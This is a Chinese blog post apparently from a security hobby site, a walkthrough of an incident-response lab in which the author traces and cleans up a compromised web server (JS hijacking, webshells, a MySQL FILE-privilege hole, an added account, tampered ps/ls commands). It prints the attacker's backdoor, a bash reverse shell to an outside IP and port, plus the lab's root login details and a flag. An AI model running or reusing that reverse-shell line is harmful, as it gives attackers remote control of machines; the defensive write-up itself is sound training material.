首页
关于
联系我们
本站友链
站点统计
站点留言
更多
本站壁纸
Search
1
cc攻击脚本加教程
92 阅读
2
植物大战僵尸杂交版秒杀包
69 阅读
3
子比搭建教程
64 阅读
4
黑客入侵黑页html源码
46 阅读
5
查看摄像头实时画面
45 阅读
默认分类
网络安全
个人笔记
网站源码
ctf
web
红蓝功防
应急响应
密码学
kali
linux
网安故事
日常
登录
/
注册
Search
标签搜索
ctf
网络安全
技术分享
工具
lucky博士
累计撰写
34
篇文章
累计收到
46
条评论
首页
栏目
默认分类
网络安全
个人笔记
网站源码
ctf
web
红蓝功防
应急响应
密码学
kali
linux
网安故事
日常
页面
关于
联系我们
本站友链
站点统计
站点留言
本站壁纸
搜索到
1
篇与
网络安全
的结果
2024-03-01
靶机渗透-应急加固1
{mtitle title="靶机渗透-应急加固1"/} {callout color="#f0ad4e"}环境:服务器:139.196.218.29 账号:root 密码:qgQFmTaZrLERjtRaDnGP…{/callout}js劫持{callout color="#f0ad4e"}获取js劫持域名(带https){/callout}黑客首次webshell 密码{callout color="#f0ad4e"}黑客首次webshell 密码,不加flag{}{/callout} 黑客首次入侵方式{callout color="#f0ad4e"}黑客首次攻击(非有效攻击)通过什么方式(如:文件上传、SQL注入、命令执行){/callout}因为首个马在uploads文件夹下,猜测就是文件上传漏洞,但是不对,去看一下日志 xss黑客服务器的信息{callout color="#f0ad4e"}请找到黑客留下的后门中黑客服务器的ip及端口{/callout} 查看进程发现存在可疑1.sh 访问发现是反弹的shellroot@iZuf6i9l9nqrfyk7eo6l0nZ:/var/log/nginx# cat /var/www/html/runtime/cache/1.sh #!/bin/bash bash -i >& /dev/tcp/49.232.241.253/8888 0>&149.232.241.253:8888黑客的webshell2{callout color="#f0ad4e"}提交黑客上传的第二个webshell内的flag{/callout}{callout color="#f0ad4e"} web日志取证分析工具 - 实验室 - 腾讯安全应急响应中心 (tencent.com) https://strawberryperl.com/ {/callout}使用方法: Perl LogForensics.pl -file logfile -websvr (nginx|httpd) [-ip ip(ip,ip,ip)|-url url(url,url,url)] File:日志文件路径 Websvr : 日志类型 Ip: 起始调查IP或ip列表,以逗号分割 url: 起始调查cgi 链接或链接列表,以逗号分割usage: LogForensics.pl -file logfile -websvr (nginx|httpd) [-ip ip(ip,ip,ip)|-url url(url,url,url)] root@iZuf6i9l9nqrfyk7eo6l0nZ:/var/log/nginx# ./LogForensics.pl -file ./access.log -websvr nginx Web log forensics ver2014102301 by xti9er [*] ip=NULL url=NULL [*] PRELOAD ./access.log Plz wait [*] LOAD ./access.log.db [!] ip + 59 & url + 6 and go on [*] Export report... Plz wait [*] All Done in 2 s , ip[1] url[6]1.php就是第二个马flag{5t945bbwxokj87f1ucjb2vc7zdnf8ix3}mysql{callout color="#f0ad4e"}修复mysql可getshell漏洞{/callout}先得连上数据库,找配置文件,这种可以先全局搜一下database.php,config.php等等关键词文件/var/www/html/application/database.php回收用户file权限并且关闭全局日志revoke file on *.* from 'root'@'localhost'; set global general_log = off; flush privileges;黑客的账号{callout color="#f0ad4e"}找到黑客添加的账号并删除{/callout}aman删除userdel aman黑客篡改的命令1{callout color="#f0ad4e"}修复黑客篡改的命令并且删除篡改命令生成的免杀马{/callout}删除替换rm ps mv ps_ ps rm ls mv ls2 ls rm /var/www/html/public/static/img/1.php修复JS劫持{callout color="#f0ad4e"}修复JS劫持{/callout}最慢的当然就是一点一点找了,或者用find命令root@iZuf6i9l9nqrfyk7eo6l0nZ:/var/www/html# find . | xargs grep -ri '<script type="text/javascript">' -l | sort | uniq -c 6 ./application/home/view/public/js.html 4 ./runtime/temp/7989650828d8c92a2cbbbcbe7c322c03.php 4 ./runtime/temp/ba0546f2ed29bcb24fbace34b295ef45.php 4 ./thinkphp/tpl/dispatch_jump.tpl 4 ./thinkphp/tpl/page_trace.tpl删除俩马和恶意代码即可修复root@iZuf6i9l9nqrfyk7eo6l0nZ:/var/www/html# rm ./runtime/temp/ba0546f2ed29bcb24fbace34b295ef45.php root@iZuf6i9l9nqrfyk7eo6l0nZ:/var/www/html# rm ./runtime/temp/7989650828d8c92a2cbbbcbe7c322c03.php{abtn icon="fa-user-o" color="#ff6800" href="http://blog.luckyos.top/1/wzskm.jpg" radius="17.5" content="欢迎打赏"/}
2024年03月01日
17 阅读
0 评论
3 点赞